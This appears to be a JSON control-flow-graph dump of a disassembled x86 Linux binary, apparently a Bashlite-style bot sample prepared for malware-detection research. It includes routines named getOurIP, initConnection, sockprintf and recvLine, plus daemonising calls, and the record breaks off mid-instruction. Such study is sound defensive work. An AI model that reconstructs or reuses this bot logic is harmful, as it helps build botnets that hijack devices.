{"node_dict": {"134535833": {"node_name": "main", "node_label": "37", "insns": [[134535833, "lea", "ecx, [esp + 4]"], [134535837, "and", "esp, 0xfffffff0"], [134535840, "push", "dword ptr [ecx - 4]"], [134535843, "push", "ebp"], [134535844, "mov", "ebp, esp"], [134535846, "push", "edi"], [134535847, "push", "esi"], [134535848, "push", "ebx"], [134535849, "push", "ecx"], [134535850, "sub", "esp, 0x14c8"], [134535856, "mov", "ebx, ecx"], [134535858, "mov", "dword ptr [ebp - 0x4c], 0x805610b"], [134535865, "call", "0x804da8f"]]}, "134535823": {"node_name": "getBuild", "node_label": "10", "insns": [[134535823, "push", "ebp"], [134535824, "mov", "ebp, esp"], [134535826, "mov", "eax, 0x80560f4"], [134535831, "pop", "ebp"], [134535832, "ret", ""]]}, "134535870": {"node_name": "main+0x25", "node_label": "14", "insns": [[134535870, "sub", "esp, 8"], [134535873, "push", "eax"], [134535874, "push", "0x805611e"], [134535879, "call", "0x804e77c"]]}, "134539132": {"node_name": "__GI_printf", "node_label": "28", "insns": [[134539132, "sub", "esp, 0x1c"], [134539135, "lea", "eax, [esp + 0x24]"], [134539139, "mov", "dword ptr [esp + 0x18], eax"], [134539143, "push", "edx"], [134539144, "push", "eax"], [134539145, "push", "dword ptr [esp + 0x28]"], [134539149, "push", "dword ptr [0x80581d8]"], [134539155, "call", "0x804e99c"]]}, "134535884": {"node_name": "main+0x33", "node_label": "28", "insns": [[134535884, "add", "esp, 0x10"], [134535887, "mov", "eax, dword ptr [ebx + 4]"], [134535890, "mov", "eax, dword ptr [eax]"], [134535892, "mov", "ecx, 0xffffffff"], [134535897, "mov", "dword ptr [ebp - 0x14b4], eax"], [134535903, "mov", "al, 0"], [134535905, "cld", ""], [134535906, "mov", "edi, dword ptr [ebp - 0x14b4]"]]}, "134535912": {"node_name": "main+0x4f", "node_label": "2", "insns": [[134535912, "repne scasb", "al, byte ptr es:[edi]"]]}, "134535914": {"node_name": "main+0x51", "node_label": "27", "insns": [[134535914, "mov", "eax, ecx"], [134535916, "not", "eax"], [134535918, "lea", "edx, [eax - 1]"], [134535921, "mov", "eax, dword ptr [ebx + 4]"], [134535924, "mov", "eax, dword ptr [eax]"], [134535926, "sub", "esp, 4"], [134535929, "push", "edx"], [134535930, "push", "0x8056128"], [134535935, "push", "eax"], [134535936, "call", "0x804f758"]]}, "134535941": {"node_name": "main+0x6c", "node_label": "33", "insns": [[134535941, "add", "esp, 0x10"], [134535944, "mov", "edx, 0x805610b"], [134535949, "mov", "eax, dword ptr [ebx + 4]"], [134535952, "mov", "dword ptr [eax], edx"], [134535954, "mov", "eax, dword ptr [ebp - 0x4c]"], [134535957, "sub", "esp, 0xc"], [134535960, "push", "0"], [134535962, "push", "0"], [134535964, "push", "0"], [134535966, "push", "eax"], [134535967, "push", "0xf"], [134535969, "call", "0x804e584"]]}, "134543192": {"node_name": "__GI_strncpy", "node_label": "18", "insns": [[134543192, "push", "edi"], [134543193, "push", "esi"], [134543194, "sub", "esp, 4"], [134543197, "mov", "esi, dword ptr [esp + 0x14]"], [134543201, "mov", "ecx, dword ptr [esp + 0x18]"], [134543205, "mov", "edi, dword ptr [esp + 0x10]"], [134543209, "inc", "ecx"]]}, "134538628": {"node_name": "prctl", "node_label": "35", "insns": [[134538628, "push", "edi"], [134538629, "push", "esi"], [134538630, "sub", "esp, 4"], [134538633, "mov", "ecx, dword ptr [esp + 0x14]"], [134538637, "mov", "edx, dword ptr [esp + 0x18]"], [134538641, "mov", "esi, dword ptr [esp + 0x1c]"], [134538645, "mov", "edi, dword ptr [esp + 0x20]"], [134538649, "mov", "eax, dword ptr [esp + 0x10]"], [134538653, "push", "ebx"], [134538654, "mov", "ebx, eax"], [134538656, "mov", "eax, 0xac"], [134538661, "int", "0x80"]]}, "134535974": {"node_name": "main+0x8d", "node_label": "13", "insns": [[134535974, "add", "esp, 0x20"], [134535977, "sub", "esp, 0xc"], [134535980, "push", "0"], [134535982, "call", "0x804e6bc"]]}, "134538940": {"node_name": "time", "node_label": "18", "insns": [[134538940, "push", "edi"], [134538941, "sub", "esp, 8"], [134538944, "mov", "edi, dword ptr [esp + 0x10]"], [134538948, "push", "ebx"], [134538949, "mov", "ebx, edi"], [134538951, "mov", "eax, 0xd"], [134538956, "int", "0x80"]]}, "134535987": {"node_name": "main+0x9a", "node_label": "10", "insns": [[134535987, "add", "esp, 0x10"], [134535990, "mov", "ebx, eax"], [134535992, "call", "0x804e420"]]}, "134538272": {"node_name": "__GI_getpid", "node_label": "11", "insns": [[134538272, "push", "ebx"], [134538273, "sub", "esp, 8"], [134538276, "mov", "eax, 0x14"], [134538281, "int", "0x80"]]}, "134535997": {"node_name": "main+0xa4", "node_label": "11", "insns": [[134535997, "xor", "eax, ebx"], [134535999, "sub", "esp, 0xc"], [134536002, "push", "eax"], [134536003, "call", "0x8050ec4"]]}, "134549188": {"node_name": "srandom", "node_label": "24", "insns": [[134549188, "push", "ebx"], [134549189, "sub", "esp, 0x1c"], [134549192, "push", "0x8058340"], [134549197, "push", "0x80517a7"], [134549202, "lea", "ebx, [esp + 0x14]"], [134549206, "push", "ebx"], [134549207, "call", "0x80517aa"]]}, "134536008": {"node_name": "main+0xaf", "node_label": "13", "insns": [[134536008, "add", "esp, 0x10"], [134536011, "sub", "esp, 0xc"], [134536014, "push", "0"], [134536016, "call", "0x804e6bc"]]}, "134536021": {"node_name": "main+0xbc", "node_label": "10", "insns": [[134536021, "add", "esp, 0x10"], [134536024, "mov", "ebx, eax"], [134536026, "call", "0x804e420"]]}, "134536031": {"node_name": "main+0xc6", "node_label": "8", "insns": [[134536031, "xor", "eax, ebx"], [134536033, "push", "eax"], [134536034, "call", "0x8048188"]]}, "134513032": {"node_name": "init_rand", "node_label": "49", "insns": [[134513032, "push", "ebp"], [134513033, "mov", "ebp, esp"], [134513035, "sub", "esp, 0x10"], [134513038, "mov", "eax, dword ptr [ebp + 8]"], [134513041, "mov", "dword ptr [0x8058480], eax"], [134513046, "mov", "eax, dword ptr [ebp + 8]"], [134513049, "sub", "eax, 0x61c88647"], [134513054, "mov", "dword ptr [0x8058484], eax"], [134513059, "mov", "eax, dword ptr [ebp + 8]"], [134513062, "add", "eax, 0x3c6ef372"], [134513067, "mov", "dword ptr [0x8058488], eax"], [134513072, "mov", "dword ptr [ebp - 4], 3"], [134513079, "jmp", "0x80481ec"]]}, "134536039": {"node_name": "main+0xce", "node_label": "8", "insns": [[134536039, "add", "esp, 4"], [134536042, "call", "0x804d886"]]}, "134535302": {"node_name": "getOurIP", "node_label": "23", "insns": [[134535302, "push", "ebp"], [134535303, "mov", "ebp, esp"], [134535305, "sub", "esp, 0x1068"], [134535311, "sub", "esp, 4"], [134535314, "push", "0"], [134535316, "push", "2"], [134535318, "push", "2"], [134535320, "call", "0x804ff94"]]}, "134536047": {"node_name": "main+0xd6", "node_label": "5", "insns": [[134536047, "call", "0x804e3d0"]]}, "134538192": {"node_name": "__libc_fork", "node_label": "11", "insns": [[134538192, "push", "ebx"], [134538193, "sub", "esp, 8"], [134538196, "mov", "eax, 2"], [134538201, "int", "0x80"]]}, "134536052": {"node_name": "main+0xdb", "node_label": "9", "insns": [[134536052, "mov", "dword ptr [ebp - 0x48], eax"], [134536055, "cmp", "dword ptr [ebp - 0x48], 0"], [134536059, "je", "0x804db9b"]]}, "134536091": {"node_name": "main+0x102", "node_label": "6", "insns": [[134536091, "cmp", "dword ptr [ebp - 0x48], 0"], [134536095, "jne", "0x804dbb9"]]}, "134536061": {"node_name": "main+0xe4", "node_label": "17", "insns": [[134536061, "sub", "esp, 4"], [134536064, "push", "0"], [134536066, "lea", "eax, [ebp - 0x50]"], [134536069, "push", "eax"], [134536070, "push", "dword ptr [ebp - 0x48]"], [134536073, "call", "0x804e6ec"]]}, "134536097": {"node_name": "main+0x108", "node_label": "5", "insns": [[134536097, "call", "0x804e3d0"]]}, "134536121": {"node_name": "main+0x120", "node_label": "5", "insns": [[134536121, "call", "0x804e63c"]]}, "134538988": {"node_name": "__GI_waitpid", "node_label": "22", "insns": [[134538988, "sub", "esp, 0xc"], [134538991, "push", "0"], [134538993, "push", "dword ptr [esp + 0x1c]"], [134538997, "push", "dword ptr [esp + 0x1c]"], [134539001, "push", "dword ptr [esp + 0x1c]"], [134539005, "call", "0x8051d3c"]]}, "134536078": {"node_name": "main+0xf5", "node_label": "13", "insns": [[134536078, "add", "esp, 0x10"], [134536081, "sub", "esp, 0xc"], [134536084, "push", "0"], [134536086, "call", "0x80513c0"]]}, "134536102": {"node_name": "main+0x10d", "node_label": "9", "insns": [[134536102, "mov", "dword ptr [ebp - 0x44], eax"], [134536105, "cmp", "dword ptr [ebp - 0x44], 0"], [134536109, "je", "0x804dbb9"]]}, "134538812": {"node_name": "setsid", "node_label": "11", "insns": [[134538812, "push", "ebx"], [134538813, "sub", "esp, 8"], [134538816, "mov", "eax, 0x42"], [134538821, "int", "0x80"]]}, "134536126": {"node_name": "main+0x125", "node_label": "13", "insns": [[134536126, "sub", "esp, 0xc"], [134536129, "push", "0x8056129"], [134536134, "call", "0x804e33c"]]}, "134550464": {"node_name": "exit", "node_label": "29", "insns": [[134550464, "push", "esi"], [134550465, "push", "ebx"], [134550466, "sub", "esp, 0x18"], [134550469, "mov", "esi, dword ptr [esp + 0x24]"], [134550473, "push", "0x8058400"], [134550478, "push", "0x80517a7"], [134550483, "lea", "ebx, [esp + 0x10]"], [134550487, "push", "ebx"], [134550488, "call", "0x80517aa"]]}, "134536111": {"node_name": "main+0x116", "node_label": "10", "insns": [[134536111, "sub", "esp, 0xc"], [134536114, "push", "0"], [134536116, "call", "0x80513c0"]]}, "134538044": {"node_name": "__GI_chdir", "node_label": "18", "insns": [[134538044, "push", "edi"], [134538045, "sub", "esp, 8"], [134538048, "mov", "edi, dword ptr [esp + 0x10]"], [134538052, "push", "ebx"], [134538053, "mov", "ebx, edi"], [134538055, "mov", "eax, 0xc"], [134538060, "int", "0x80"]]}, "134536139": {"node_name": "main+0x132", "node_label": "15", "insns": [[134536139, "add", "esp, 0x10"], [134536142, "sub", "esp, 8"], [134536145, "push", "1"], [134536147, "push", "0xd"], [134536149, "call", "0x8050008"]]}, "134545416": {"node_name": "__GI_signal", "node_label": "26", "insns": [[134545416, "push", "ebx"], [134545417, "sub", "esp, 0x128"], [134545423, "mov", "eax, dword ptr [esp + 0x134]"], [134545430, "mov", "ebx, dword ptr [esp + 0x130]"], [134545437, "cmp", "eax, -1"], [134545440, "je", "0x805002b"]]}, "134536154": {"node_name": "main+0x141", "node_label": "5", "insns": [[134536154, "add", "esp, 0x10"], [134536157, "jmp", "0x804dbdf"]]}, "134536159": {"node_name": "main+0x146", "node_label": "5", "insns": [[134536159, "call", "0x804d751"]]}, "134534993": {"node_name": "initConnection", "node_label": "34", "insns": [[134534993, "push", "ebp"], [134534994, "mov", "ebp, esp"], [134534996, "sub", "esp, 0x1018"], [134535002, "lea", "eax, [ebp - 0x1004]"], [134535008, "mov", "edx, eax"], [134535010, "mov", "eax, 0x1000"], [134535015, "sub", "esp, 4"], [134535018, "push", "eax"], [134535019, "push", "0"], [134535021, "push", "edx"], [134535022, "call", "0x804f6f0"]]}, "134536164": {"node_name": "main+0x14b", "node_label": "4", "insns": [[134536164, "test", "eax, eax"], [134536166, "je", "0x804dbf7"]]}, "134536183": {"node_name": "main+0x15e", "node_label": "5", "insns": [[134536183, "call", "0x804da8f"]]}, "134536168": {"node_name": "main+0x14f", "node_label": "10", "insns": [[134536168, "sub", "esp, 0xc"], [134536171, "push", "5"], [134536173, "call", "0x8051494"]]}, "134536188": {"node_name": "main+0x163", "node_label": "21", "insns": [[134536188, "mov", "edx, dword ptr [0x8058460]"], [134536194, "sub", "esp, 4"], [134536197, "push", "eax"], [134536198, "push", "0x805612b"], [134536203, "push", "edx"], [134536204, "call", "0x804882a"]]}, "134550676": {"node_name": "__GI_sleep", "node_label": "26", "insns": [[134550676, "push", "ebp"], [134550677, "push", "edi"], [134550678, "push", "esi"], [134550679, "push", "ebx"], [134550680, "sub", "esp, 0x1ac"], [134550686, "mov", "eax, 0x20"], [134550691, "mov", "edx, dword ptr [esp + 0x1c0]"], [134550698, "test", "edx, edx"], [134550700, "jne", "0x80514be"]]}, "134536178": {"node_name": "main+0x159", "node_label": "5", "insns": [[134536178, "add", "esp, 0x10"], [134536181, "jmp", "0x804dbdf"]]}, "134514730": {"node_name": "sockprintf", "node_label": "20", "insns": [[134514730, "push", "ebp"], [134514731, "mov", "ebp, esp"], [134514733, "push", "edi"], [134514734, "sub", "esp, 0x24"], [134514737, "sub", "esp, 0xc"], [134514740, "push", "0x800"], [134514745, "call", "0x8050142"]]}, "134536209": {"node_name": "main+0x178", "node_label": "22", "insns": [[134536209, "add", "esp, 0x10"], [134536212, "mov", "dword ptr [ebp - 0x40], 0"], [134536219, "mov", "dword ptr [ebp - 0x3c], 0"], [134536226, "jmp", "0x804e234"]]}, "134537780": {"node_name": "main+0x79b", "node_label": "27", "insns": [[134537780, "lea", "eax, [ebp - 0x1478]"], [134537786, "mov", "edx, dword ptr [0x8058460]"], [134537792, "sub", "esp, 4"], [134537795, "push", "0x1000"], [134537800, "push", "eax"], [134537801, "push", "edx"], [134537802, "call", "0x804916b"]]}, "134537807": {"node_name": "main+0x7b6", "node_label": "16", "insns": [[134537807, "add", "esp, 0x10"], [134537810, "mov", "dword ptr [ebp - 0x40], eax"], [134537813, "cmp", "dword ptr [ebp - 0x40], -1"], [134537817, "jne", "0x804dc27"]]}, "134517099": {"node_name": "recvLine", "node_label": "23", "insns": [[134517099, "push", "ebp"], [134517100, "mov", "ebp, esp"], [134517102, "push", "edi"], [134517103, "sub", "esp, 0xb4"], [134517109, "mov", "edx, dword ptr [ebp + 0x10]"], [134517112, "mov", "eax, dword ptr [ebp + 0xc]"], [134517115, "mov", "edi, eax"], [134517117, "cld", ""], [134517118, "mov", "ecx, edx"], [134517120, "mov", "al, 0"]]}, "134537823": {"node_name": "main+0x7c6", "node_label": "5", "insns": [[134537823, "jmp", "0x804dbdf"]]}, "134536231": {"node_name": "main+0x18e", "node_label": "12", "insns": [[134536231, "mov", "dword ptr [ebp - 0x3c], 0"], [134536238, "jmp", "0x804dddc"]]}, "134536668": {"node_name": "main+0x343", "node_label": "62", "insns": [[134536668, "mov", "eax, dword ptr [ebp - 0x3c]"], [134536671, "mov", "dword ptr [ebp - 0x1490], eax"], [134536677, "mov", "edx, eax"], [134536679, "sar", "edx, 0x1f"], [134536682, "mov", "dword ptr [ebp - 0x148c], edx"], [134536688, "mov", "esi, dword ptr [0x8058468]"], [134536694, "mov", "edi, dword ptr [0x805846c]"], [134536700, "mov", "dword ptr [ebp - 0x1488], esi"], [134536706, "mov", "dword ptr [ebp - 0x1484], edi"], [134536712, "mov", "edi, dword ptr [ebp - 0x1484]"], [134536718, "cmp", "dword ptr [ebp - 0x148c], edi"], [134536724, "jb", "0x804dc33"]]}, "134536243": {"node_name": "main+0x19a", "node_label": "31", "insns": [[134536243, "mov", "eax, dword ptr [ebp - 0x3c]"], [134536246, "shl", "eax, 2"], [134536249, "mov", "edx, eax"], [134536251, "mov", "eax, dword ptr [0x805e6f0]"], [134536256, "lea", "eax, [edx + eax]"], [134536259, "mov", "eax, dword ptr [eax]"], [134536261, "sub", "esp, 4"], [134536264, "push", "1"], [134536266, "push", "0"], [134536268, "push", "eax"], [134536269, "call", "0x804e6ec"]]}, "134536730": {"node_name": "main+0x381", "node_label": "14", "insns": [[134536730, "mov", "eax, dword ptr [ebp - 0x1484]"], [134536736, "cmp", "dword ptr [ebp - 0x148c], eax"], [134536742, "ja", "0x804de3a"]]}, "134536274": {"node_name": "main+0x1b9", "node_label": "11", "insns": [[134536274, "add", "esp, 0x10"], [134536277, "test", "eax, eax"], [134536279, "jle", "0x804ddd9"]]}, "134536744": {"node_name": "main+0x38f", "node_label": "18", "insns": [[134536744, "mov", "edx, dword ptr [ebp - 0x1488]"], [134536750, "cmp", "dword ptr [ebp - 0x1490], edx"], [134536756, "jb", "0x804dc33"]]}, "134536762": {"node_name": "main+0x3a1", "node_label": "26", "insns": [[134536762, "mov", "eax, dword ptr [ebp - 0x40]"], [134536765, "mov", "byte ptr [ebp + eax - 0x1478], 0"], [134536773, "sub", "esp, 0xc"], [134536776, "lea", "eax, [ebp - 0x1478]"], [134536782, "push", "eax"], [134536783, "call", "0x80482b7"]]}, "134536285": {"node_name": "main+0x1c4", "node_label": "9", "insns": [[134536285, "mov", "eax, dword ptr [ebp - 0x3c]"], [134536288, "inc", "eax"], [134536289, "mov", "dword ptr [ebp - 0x30], eax"], [134536292, "jmp", "0x804dc90"]]}, "134536665": {"node_name": "main+0x340", "node_label": "3", "insns": [[134536665, "inc", "dword ptr [ebp - 0x3c]"]]}, "134536788": {"node_name": "main+0x3bb", "node_label": "23", "insns": [[134536788, "add", "esp, 0x10"], [134536791, "sub", "esp, 8"], [134536794, "push", "0x8055e77"], [134536799, "lea", "eax, [ebp - 0x1478]"], [134536805, "push", "eax"], [134536806, "call", "0x804f79c"]]}, "134513335": {"node_name": "trim", "node_label": "31", "insns": [[134513335, "push", "ebp"], [134513336, "mov", "ebp, esp"], [134513338, "push", "edi"], [134513339, "sub", "esp, 0x14"], [134513342, "mov", "dword ptr [ebp - 0xc], 0"], [134513349, "mov", "eax, dword ptr [ebp + 8]"], [134513352, "mov", "ecx, 0xffffffff"], [134513357, "mov", "dword ptr [ebp - 0x18], eax"], [134513360, "mov", "al, 0"], [134513362, "cld", ""], [134513363, "mov", "edi, dword ptr [ebp - 0x18]"]]}, "134536336": {"node_name": "main+0x1f7", "node_label": "58", "insns": [[134536336, "mov", "eax, dword ptr [ebp - 0x30]"], [134536339, "mov", "edx, 0"], [134536344, "mov", "dword ptr [ebp - 0x14b0], eax"], [134536350, "mov", "dword ptr [ebp - 0x14ac], edx"], [134536356, "mov", "edx, dword ptr [0x8058468]"], [134536362, "mov", "ecx, dword ptr [0x805846c]"], [134536368, "mov", "dword ptr [ebp - 0x14a8], edx"], [134536374, "mov", "dword ptr [ebp - 0x14a4], ecx"], [134536380, "mov", "ecx, dword ptr [ebp - 0x14a4]"], [134536386, "cmp", "dword ptr [ebp - 0x14ac], ecx"], [134536392, "jb", "0x804dc66"]]}, "134543260": {"node_name": "__GI_strstr", "node_label": "26", "insns": [[134543260, "push", "ebp"], [134543261, "push", "edi"], [134543262, "push", "esi"], [134543263, "push", "ebx"], [134543264, "sub", "esp, 8"], [134543267, "mov", "edx, dword ptr [esp + 0x20]"], [134543271, "mov", "ebx, dword ptr [esp + 0x1c]"], [134543275, "movzx", "ebp, byte ptr [edx]"], [134543278, "test", "ebp, ebp"], [134543280, "je", "0x804f855"]]}, "134536811": {"node_name": "main+0x3d2", "node_label": "15", "insns": [[134536811, "add", "esp, 0x10"], [134536814, "mov", "edx, eax"], [134536816, "lea", "eax, [ebp - 0x1478]"], [134536822, "cmp", "edx, eax"], [134536824, "jne", "0x804de95"]]}, "134536394": {"node_name": "main+0x231", "node_label": "14", "insns": [[134536394, "mov", "esi, dword ptr [ebp - 0x14a4]"], [134536400, "cmp", "dword ptr [ebp - 0x14ac], esi"], [134536406, "ja", "0x804dce6"]]}, "134536294": {"node_name": "main+0x1cd", "node_label": "42", "insns": [[134536294, "mov", "eax, dword ptr [ebp - 0x30]"], [134536297, "shl", "eax, 2"], [134536300, "mov", "edx, eax"], [134536302, "mov", "eax, dword ptr [0x805e6f0]"], [134536307, "lea", "eax, [edx + eax]"], [134536310, "lea", "ecx, [eax - 4]"], [134536313, "mov", "eax, dword ptr [ebp - 0x30]"], [134536316, "shl", "eax, 2"], [134536319, "mov", "edx, eax"], [134536321, "mov", "eax, dword ptr [0x805e6f0]"], [134536326, "lea", "eax, [edx + eax]"], [134536329, "mov", "eax, dword ptr [eax]"], [134536331, "mov", "dword ptr [ecx], eax"], [134536333, "inc", "dword ptr [ebp - 0x30]"]]}, "134536826": {"node_name": "main+0x3e1", "node_label": "19", "insns": [[134536826, "mov", "eax, dword ptr [0x8058460]"], [134536831, "sub", "esp, 8"], [134536834, "push", "0x8056134"], [134536839, "push", "eax"], [134536840, "call", "0x804882a"]]}, "134536853": {"node_name": "main+0x3fc", "node_label": "20", "insns": [[134536853, "sub", "esp, 8"], [134536856, "push", "0x8056139"], [134536861, "lea", "eax, [ebp - 0x1478]"], [134536867, "push", "eax"], [134536868, "call", "0x804f79c"]]}, "134536408": {"node_name": "main+0x23f", "node_label": "14", "insns": [[134536408, "mov", "edi, dword ptr [ebp - 0x14a8]"], [134536414, "cmp", "dword ptr [ebp - 0x14b0], edi"], [134536420, "jb", "0x804dc66"]]}, "134536422": {"node_name": "main+0x24d", "node_label": "83", "insns": [[134536422, "mov", "eax, dword ptr [ebp - 0x30]"], [134536425, "shl", "eax, 2"], [134536428, "mov", "edx, eax"], [134536430, "mov", "eax, dword ptr [0x805e6f0]"], [134536435, "lea", "eax, [edx + eax]"], [134536438, "sub", "eax, 4"], [134536441, "mov", "dword ptr [eax], 0"], [134536447, "mov", "eax, dword ptr [0x8058468]"], [134536452, "mov", "edx, dword ptr [0x805846c]"], [134536458, "add", "eax, -1"], [134536461, "adc", "edx, -1"], [134536464, "mov", "dword ptr [0x8058468], eax"], [134536469, "mov", "dword ptr [0x805846c], edx"], [134536475, "mov", "eax, dword ptr [0x8058468]"], [134536480, "mov", "edx, dword ptr [0x805846c]"], [134536486, "shld", "edx, eax, 2"], [134536490, "shl", "eax, 2"], [134536493, "add", "eax, 4"], [134536496, "sub", "esp, 0xc"], [134536499, "push", "eax"], [134536500, "call", "0x8050142"]]}, "134536845": {"node_name": "main+0x3f4", "node_label": "8", "insns": [[134536845, "add", "esp, 0x10"], [134536848, "jmp", "0x804e234"]]}, "134536873": {"node_name": "main+0x410", "node_label": "15", "insns": [[134536873, "add", "esp, 0x10"], [134536876, "mov", "edx, eax"], [134536878, "lea", "eax, [ebp - 0x1478]"], [134536884, "cmp", "edx, eax"], [134536886, "jne", "0x804dec2"]]}, "134545730": {"node_name": "malloc", "node_label": "31", "insns": [[134545730, "push", "ebp"], [134545731, "push", "edi"], [134545732, "push", "esi"], [134545733, "push", "ebx"], [134545734, "sub", "esp, 0x40"], [134545737, "mov", "ebx, dword ptr [esp + 0x54]"], [134545741, "push", "0x8058310"], [134545746, "push", "0x80517a7"], [134545751, "lea", "eax, [esp + 0x38]"], [134545755, "push", "eax"], [134545756, "call", "0x80517aa"]]}, "134536505": {"node_name": "main+0x2a0", "node_label": "15", "insns": [[134536505, "add", "esp, 0x10"], [134536508, "mov", "dword ptr [ebp - 0x34], eax"], [134536511, "mov", "dword ptr [ebp - 0x30], 0"], [134536518, "jmp", "0x804dd6a"]]}, "134536888": {"node_name": "main+0x41f", "node_label": "10", "insns": [[134536888, "sub", "esp, 0xc"], [134536891, "push", "0"], [134536893, "call", "0x80513c0"]]}, "134536898": {"node_name": "main+0x429", "node_label": "22", "insns": [[134536898, "lea", "eax, [ebp - 0x1478]"], [134536904, "mov", "dword ptr [ebp - 0x38], eax"], [134536907, "mov", "eax, dword ptr [ebp - 0x38]"], [134536910, "mov", "al, byte ptr [eax]"], [134536912, "cmp", "al, 0x21"], [134536914, "jne", "0x804e234"]]}, "134536554": {"node_name": "main+0x2d1", "node_label": "58", "insns": [[134536554, "mov", "eax, dword ptr [ebp - 0x30]"], [134536557, "mov", "edx, 0"], [134536562, "mov", "dword ptr [ebp - 0x14a0], eax"], [134536568, "mov", "dword ptr [ebp - 0x149c], edx"], [134536574, "mov", "edx, dword ptr [0x8058468]"], [134536580, "mov", "ecx, dword ptr [0x805846c]"], [134536586, "mov", "dword ptr [ebp - 0x1498], edx"], [134536592, "mov", "dword ptr [ebp - 0x1494], ecx"], [134536598, "mov", "ecx, dword ptr [ebp - 0x1494]"], [134536604, "cmp", "dword ptr [ebp - 0x149c], ecx"], [134536610, "jb", "0x804dd48"]]}, "134536920": {"node_name": "main+0x43f", "node_label": "9", "insns": [[134536920, "mov", "eax, dword ptr [ebp - 0x38]"], [134536923, "inc", "eax"], [134536924, "mov", "dword ptr [ebp - 0x2c], eax"], [134536927, "jmp", "0x804dee4"]]}, "134536612": {"node_name": "main+0x30b", "node_label": "14", "insns": [[134536612, "mov", "esi, dword ptr [ebp - 0x1494]"], [134536618, "cmp", "dword ptr [ebp - 0x149c], esi"], [134536624, "ja", "0x804ddc0"]]}, "134536520": {"node_name": "main+0x2af", "node_label": "34", "insns": [[134536520, "mov", "eax, dword ptr [ebp - 0x30]"], [134536523, "shl", "eax, 2"], [134536526, "mov", "ecx, eax"], [134536528, "add", "ecx, dword ptr [ebp - 0x34]"], [134536531, "mov", "eax, dword ptr [ebp - 0x30]"], [134536534, "shl", "eax, 2"], [134536537, "mov", "edx, eax"], [134536539, "mov", "eax, dword ptr [0x805e6f0]"], [134536544, "lea", "eax, [edx + eax]"], [134536547, "mov", "eax, dword ptr [eax]"], [134536549, "mov", "dword ptr [ecx], eax"], [134536551, "inc", "dword ptr [ebp - 0x30]"]]}, "134536932": {"node_name": "main+0x44b", "node_label": "9", "insns": [[134536932, "mov", "eax, dword ptr [ebp - 0x2c]"], [134536935, "mov", "al, byte ptr [eax]"], [134536937, "cmp", "al, 0x20"], [134536939, "je", "0x804def6"]]}, "134536626": {"node_name": "main+0x319", "node_label": "14", "insns": [[134536626, "mov", "edi, dword ptr [ebp - 0x1498]"], [134536632, "cmp", "dword ptr [ebp - 0x14a0], edi"], [134536638, "jb", "0x804dd48"]]}, "134536640": {"node_name": "main+0x327", "node_label": "14", "insns": [[134536640, "mov", "eax, dword ptr [0x805e6f0]"], [134536645, "sub", "esp, 0xc"], [134536648, "push", "eax"], [134536649, "call", "0x8050aed"]]}, "134536950": {"node_name": "main+0x45d", "node_label": "13", "insns": [[134536950, "mov", "eax, dword ptr [ebp - 0x2c]"], [134536953, "mov", "al, byte ptr [eax]"], [134536955, "test", "al, al"], [134536957, "je", "0x804e234"]]}, "134536941": {"node_name": "main+0x454", "node_label": "9", "insns": [[134536941, "mov", "eax, dword ptr [ebp - 0x2c]"], [134536944, "mov", "al, byte ptr [eax]"], [134536946, "test", "al, al"], [134536948, "jne", "0x804dee1"]]}, "134548205": {"node_name": "free", "node_label": "19", "insns": [[134548205, "push", "ebp"], [134548206, "push", "edi"], [134548207, "push", "esi"], [134548208, "push", "ebx"], [134548209, "sub", "esp, 0x1c"], [134548212, "mov", "edi, dword ptr [esp + 0x30]"], [134548216, "test", "edi, edi"], [134548218, "je", "0x8050c81"]]}, "134536654": {"node_name": "main+0x335", "node_label": "11", "insns": [[134536654, "add", "esp, 0x10"], [134536657, "mov", "eax, dword ptr [ebp - 0x34]"], [134536660, "mov", "dword ptr [0x805e6f0], eax"]]}, "134536963": {"node_name": "main+0x46a", "node_label": "36", "insns": [[134536963, "mov", "eax, dword ptr [ebp - 0x2c]"], [134536966, "mov", "byte ptr [eax], 0"], [134536969, "mov", "eax, dword ptr [ebp - 0x38]"], [134536972, "inc", "eax"], [134536973, "mov", "dword ptr [ebp - 0x2c], eax"], [134536976, "mov", "eax, dword ptr [ebp - 0x2c]"], [134536979, "mov", "ecx, 0xffffffff"], [134536984, "mov", "dword ptr [ebp - 0x14b8], eax"], [134536990, "mov", "al, 0"], [134536992, "cld", ""], [134536993, "mov", "edi, dword ptr [ebp - 0x14b8]"]]}, "134536929": {"node_name": "main+0x448", "node_label": "3", "insns": [[134536929, "inc", "dword ptr [ebp - 0x2c]"]]}, "134536999": {"node_name": "main+0x48e", "node_label": "2", "insns": [[134536999, "repne scasb", "al, byte ptr es:[edi]"]]}, "134537001": {"node_name": "main+0x490", "node_label": "16", "insns": [[134537001, "mov", "eax, ecx"], [134537003, "not", "eax"], [134537005, "dec", "eax"], [134537006, "add", "eax, dword ptr [ebp - 0x38]"], [134537009, "add", "eax, 2"], [134537012, "mov", "dword ptr [ebp - 0x38], eax"], [134537015, "jmp", "0x804df5e"]]}, "134537054": {"node_name": "main+0x4c5", "node_label": "23", "insns": [[134537054, "mov", "eax, dword ptr [ebp - 0x38]"], [134537057, "mov", "ecx, 0xffffffff"], [134537062, "mov", "dword ptr [ebp - 0x14c0], eax"], [134537068, "mov", "al, 0"], [134537070, "cld", ""], [134537071, "mov", "edi, dword ptr [ebp - 0x14c0]"]]}, "134537077": {"node_name": "main+0x4dc", "node_label": "2", "insns": [[134537077, "repne scasb", "al, byte ptr es:[edi]"]]}, "134537079": {"node_name": "main+0x4de", "node_label": "15", "insns": [[134537079, "mov", "eax, ecx"], [134537081, "not", "eax"], [134537083, "dec", "eax"], [134537084, "add", "eax, dword ptr [ebp - 0x38]"], [134537087, "dec", "eax"], [134537088, "mov", "al, byte ptr [eax]"], [134537090, "cmp", "al, 0xa"], [134537092, "je", "0x804df39"]]}, "134537017": {"node_name": "main+0x4a0", "node_label": "23", "insns": [[134537017, "mov", "eax, dword ptr [ebp - 0x38]"], [134537020, "mov", "ecx, 0xffffffff"], [134537025, "mov", "dword ptr [ebp - 0x14bc], eax"], [134537031, "mov", "al, 0"], [134537033, "cld", ""], [134537034, "mov", "edi, dword ptr [ebp - 0x14bc]"]]}, "134537094": {"node_name": "main+0x4ed", "node_label": "23", "insns": [[134537094, "mov", "eax, dword ptr [ebp - 0x38]"], [134537097, "mov", "ecx, 0xffffffff"], [134537102, "mov", "dword ptr [ebp - 0x14c4], eax"], [134537108, "mov", "al, 0"], [134537110, "cld", ""], [134537111, "mov", "edi, dword ptr [ebp - 0x14c4]"]]}, "134537040": {"node_name": "main+0x4b7", "node_label": "2", "insns": [[134537040, "repne scasb", "al, byte ptr es:[edi]"]]}, "134537117": {"node_name": "main+0x504", "node_label": "2", "insns": [[134537117, "repne scasb", 